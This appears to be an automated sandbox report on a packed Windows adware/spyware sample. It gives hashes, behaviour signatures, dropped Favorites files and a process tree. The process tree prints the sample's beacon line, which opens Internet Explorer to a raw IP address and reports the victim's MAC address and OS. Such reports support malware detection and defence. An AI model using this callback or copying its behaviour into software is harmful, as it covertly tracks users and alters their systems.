Overview

overview

7

Static

static

7

b6941b74ed...18.exe

windows7-x64

7

b6941b74ed...18.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    134s
  • max time network
    112s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/08/2024, 05:54

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe

  • Size

    55KB

  • MD5

    b6941b74ed311ebd834469cc47cbaa59

  • SHA1

    b47765e48e609afbca75453dfb3cdc1135df4c86

  • SHA256

    f7260634e8684ca281fcdf1454bbef0b0d2b9ae9d000d25ac7433bf6ddcf64df

  • SHA512

    29c1e68487f1c4ef30335a36f16fd4dd69d0f3f1867db9399fa075a627442a61847836d1310b9b954996831d56627949b793f967224c429749fdfec8e3bf6174

  • SSDEEP

    1536:qaREAVLhLiM/xhfMLzaLa6hIAsdxn6sM0TZMl9V4:BvLJTphfKp6hIAsdxn6sM0TZMl9V4

Score
7/10
discoveryupx

Malware Config

Signatures

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118.exe"
    1⤵
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=de-20-cd-0d-11-aa&os=Microsoft Windows XP&flag=53b9b6ac1fdff5ad5762a674c82c934e&user=b6941b74ed311ebd834469cc47cbaa59_JaffaCakes118
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4288
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4288 CREDAT:17410 /prefetch:2
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3900

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\KDOTUZKP\suggestions[1].en-US
    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

    Download Submit

  • C:\Users\Admin\Favorites\45575.comÔÚÏßµÄСÓÎÏ·.×îºÃÍæ×îÐÂ×î¿ì¿á³¬¼¶Ð¡ÓÎÏ·!.html
    Filesize

    259B

    MD5

    9eb23c46d269c9debb4345e011e07a4c

    SHA1

    1af312d49b19680ba9776e003aced6602937900f

    SHA256

    f6711066243605d4efa6c1015a4dab4d4e57063a2b84513b665d795bd572c047

    SHA512

    d39d84d0b2b0d9ec520aecbb5dcf26b5b7809048bc895c20c503ac370127f4d56af50ff525843b3bc31f1eef22c6bdae9c672a81b8591f9d1350e343c881ef23

    Download Submit

  • C:\Users\Admin\Favorites\µ±µ±Íø¡ªÍøÉϹºÎïÖÐÐÄ.html
    Filesize

    261B

    MD5

    0d4670b01f65bc72dbf1af3b36ef4f2d

    SHA1

    97553344d494e9b52990d3e1de18db8d1bbc8744

    SHA256

    306a437106117981a9b66c57946da8388998cda83870657b63b0858e8ae12d39

    SHA512

    217d351fa2416443f180efc75ee6306da701a5feae1ad779bbb57682e314b7a310ad0db27f2e0815c936713bbe816086a3d1bbdc9d48cc08afc8d33f0b5702b6

    Download Submit

  • C:\Users\Admin\Favorites\¿´¿´µçÊÓ¾çÔÚÏß´óÈ«,,,×îºÃÂÌÉ«×îиßËÙÃâ·ÑµçÊÓ¾çÍøÕ¾!.html
    Filesize

    266B

    MD5

    c81a8562bf7c8401b8052977fe6e802a

    SHA1

    e54c0e0b91d5a861b20548d30a2ffd350abfac09

    SHA256

    8d101ea02c9bce0d4d091b247546d4caccd887752b6f4c3b44a0f8956c303fda

    SHA512

    f9c855217976830f76a42561ddb181cbc8879a0327db7940715d3e377dd047dbd9c0852c68751dfd9a6e2f564f10338820c02c98f73ffc0a5ed9dd50fc1652cb

    Download Submit

  • C:\Users\Admin\Favorites\ÃÀÅ®·áÐØ´óÃؾ÷-20ÌìÄÚѸËÙÔö´ó´ó´ó!.html
    Filesize

    271B

    MD5

    e5c8bb1ba6bc6de3d4ddac2f0bf47e7d

    SHA1

    70900371edfcdcb01b063e731e56d129369c64a8

    SHA256

    334812944df9a9938b114b7ec02177c4bdb6cbb8dd362ea43d119a37feb2062f

    SHA512

    c3635728cb6e5327276220b57bab8c6068b50130250f8151c06134f17e143067feb04e2f47cecf6fca0d6c046325012492c67d3837ea3e57a516e0b7c4408769

    Download Submit

  • C:\Users\Admin\Favorites\ÌÔ±¦Íø - ÌÔ£¡ÎÒϲ»¶.html
    Filesize

    261B

    MD5

    c6140fc6cd1250bd67a4a22d7c74ec54

    SHA1

    d8371058038d78bd6d5dd8c13bafa21d236cf3e7

    SHA256

    a18fe5781913c54cf547f8bed109aa7de0961189bc7ee91e0a1851b6ca9d0610

    SHA512

    aa50040890a99db0d083674297f19c23f083934bbcc4eb30ee1ec358aa4418e2b017d2bd4314e9ed9d115e710637c82899915897118bc47c1e4edac8858cd3f7

    Download Submit

  • C:\Users\Admin\Favorites\Öйú¸£Àû²ÊƱ£¬ÌåÓý²ÊƱµÄͶעÖÐÐÄ.²ÊƱ´óÓ®¼Ò£¡.html
    Filesize

    261B

    MD5

    1dd93ff89bb660ccd77ec626a0cd052a

    SHA1

    b895b52dc80ac06edf398e538d1b82ae88df554a

    SHA256

    13aa3b6e21889b5f35f27aed509a62deea1c40de9cf1f9730328157dc00d8c9e

    SHA512

    254e5f9db48ccb6f293beb7865f21449bcdc151fed0f6b5dafba7dc7e52ac5829a50af3132c46832ad68f20e9d2b6f64c7b973a79b09e1b4d601033ae99e375e

    Download Submit

  • C:\Users\Admin\Favorites\׿ԽÑÇÂíÑ·ÍøÉϹºÎïͼÊ飬ÊÖ»ú£¬ÊýÂ룬¼Òµç£¬»¯×±Æ·£¬ÖÓ±í£¬Ê×ÊεÈÔÚÏßÏúÊÛ.html
    Filesize

    261B

    MD5

    8c9d533856807659bd89d3a99b1bedfc

    SHA1

    a55b51b5f91bea060463db9266dd6dbbc1de6ef5

    SHA256

    dd59719dc8255bddc6dcb6f54e27ab82b8f0285280379c8a90d5043d657f16fa

    SHA512

    2d8bb0fae1e09094b7e08b0c4dea5e4b9cf97cbf25638df1a7db14b113e6ab8a95f160a7ada024700f048962c2baf7bf963d16b783a45b83d1d20399cc81d158

    Download Submit

  • C:\Users\Admin\Favorites\×îÐÂÔÚÏßС˵Ãâ·ÑµÄÔĶÁ.·á¸»ÄÚÈÝËٶȿìµÄС˵վ!.html
    Filesize

    264B

    MD5

    428d1e753132e1fe27a06715e484ecc8

    SHA1

    62bd82694da83f087052c2cb6a8de923628f02a1

    SHA256

    42ca671a0639af6857bfe9716d48aa978210a66d98948a978066e1df90ad4377

    SHA512

    c21a1473639acc7f1c9f7847d0442d4ee5cbfa09d121f3024163af63a70968620bd16b56ccbca6dcb6447c4d01fb9df9dc5482ed29b38984a64afb39aadad317

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    f2279d4d35151bd46ef2b173fe150334

    SHA1

    a1cb1cb696d32c8e3ab90c5c789f73b7d90a2675

    SHA256

    2db6901c041595c0970402f3841cca1718c360c3943d3b690fb8b3b4c62aaecf

    SHA512

    d2a01efbd70dffa06542570bbd9e3720862d04eec21f7226dd11da8d7bf8e6449697009214b3f4aafe2b9af8b6c71c9b3b5632cd57a7bda3b6dcd5a514dfab64

    Download Submit

  • C:\b.txt
    Filesize

    261B

    MD5

    7bd1b88f31a6da5622837b47f26c9d3a

    SHA1

    8dfae3dcb5c0e295aa1d1b273af830e4f54d3d10

    SHA256

    6e3a41335a892b2dd58ede098db183b04e58a95b44c51e5de96fa07de0d02085

    SHA512

    8347d358c0157a57958242938c3e844f050b5a7e77d14ae1f7a99a6508766160b8e59bb5a94c5993d5a4c9ea901b1988c35648c9b8fd447589684f599b6ff443

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    878778e6ae273c74668c90ff5fc48431

    SHA1

    b85a0b7416e86c8f485be4b6c349f0ab426bc5b3

    SHA256

    119d16ac01b447b28a850c44efe9ef52f38ca8b1f9702404451fa7bfa85264c2

    SHA512

    936ae49cac20a0ec4ad87a06f4d55f629341c8713768f52ccc111a95272c7feae5614d897d2df6077b203d1d5c150b6375d1fefc9d8383daf104996501269c09

    Download Submit

  • C:\b.txt
    Filesize

    264B

    MD5

    ee765b1ebea1c25ae9e7f3ce73841c46

    SHA1

    9a729deb3d211e8bbb0198bb5e7f436056293331

    SHA256

    2013251dc3e77710d417cc8c51fdcaa3d9e4ec7c019c55020994130639f87f65

    SHA512

    5cf9a564be444151dcc8cf960aee916bbd7c21874e98a0a594d2e40e5861bdbf2cac37d8da7c30b564529600c948feefd8eda45a0bd5e55e5d5b75fe9ac84434

    Download Submit

  • C:\b.txt
    Filesize

    3KB

    MD5

    ca0294359fd9a7a27616a18c22dbd68a

    SHA1

    12aa0ef1265d0bfe5b3dd60f8aa8b71708f34104

    SHA256

    af5fc76f77e480486e0592397a6a3d22fa750eef1d20e4d5fe54937879096286

    SHA512

    8b5e93b96e3ef5da76db8f0b3bc841151fe868e71ba37cb17a3b4aea7945118983b18988e53d8b498c9a539ad982e1e9b41b5c4117d223246bc44119a8475621

    Download Submit

  • memory/1984-89-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download

  • memory/1984-0-0x0000000000400000-0x0000000000426000-memory.dmp

    Filesize

    152KB

    Download